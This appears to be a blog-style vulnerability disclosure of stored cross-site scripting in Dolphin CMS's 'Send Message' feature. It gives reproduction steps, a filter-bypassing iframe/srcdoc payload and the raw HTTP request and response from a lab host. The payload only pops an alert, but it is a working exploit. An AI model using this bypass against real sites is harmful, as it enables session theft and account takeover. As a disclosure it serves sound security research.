- It was identified that the "Send Message" functionality was vulnerable to Stored Cross-Site Scripting, opening the doors for potential account takeovers and more advanced attack scenarios
Stored XSS in Messaging Functionality
Steps to Reproduce:
- Login and visit "http://192.168.58.170/dolphinCMS/mail.php?mode=compose"
- Add "Recipient" and "Subject" with random words
- Add the below mentioned XSS payload that would bypass the XSS filter in the message section
- Intercept the HTTP POST request and add the payload once again, as it might get filtered (make sure to URL encode the spaces etc)
- It would trigger once the message has been seen
<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>
// HTTP POST request
POST /dolphinCMS/mail.php?ajax_mode=true&action=compose_mail&recipient_id=1 HTTP/1.1
Host: 192.168.58.170
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
[...]
subject=test&message=<iframe+srcdoc%3d"<img+src%3dx+onerror%3dalert(document.domain)>"></iframe>
// HTTP Response
HTTP/1.1 200 OK
Date: Fri, 21 Mar 2025 17:41:52 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 455
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
<div class="MsgBox" id="1742578912167">
<table class="MsgBox bx-def-margin-top bx-def-margin-bottom"><tr><td>
<div class="msgbox_content bx-def-font-large bx-def-padding-sec">
Message has been successfully sent. <a href="http://192.168.58.170/dolphinCMS/mail.php?mode=compose">Send</a> another message or <a href="http://192.168.58.170/dolphinCMS/admin">view</a> admin's profile. </div>
</td></tr></table>
</div>
No comments:
Post a Comment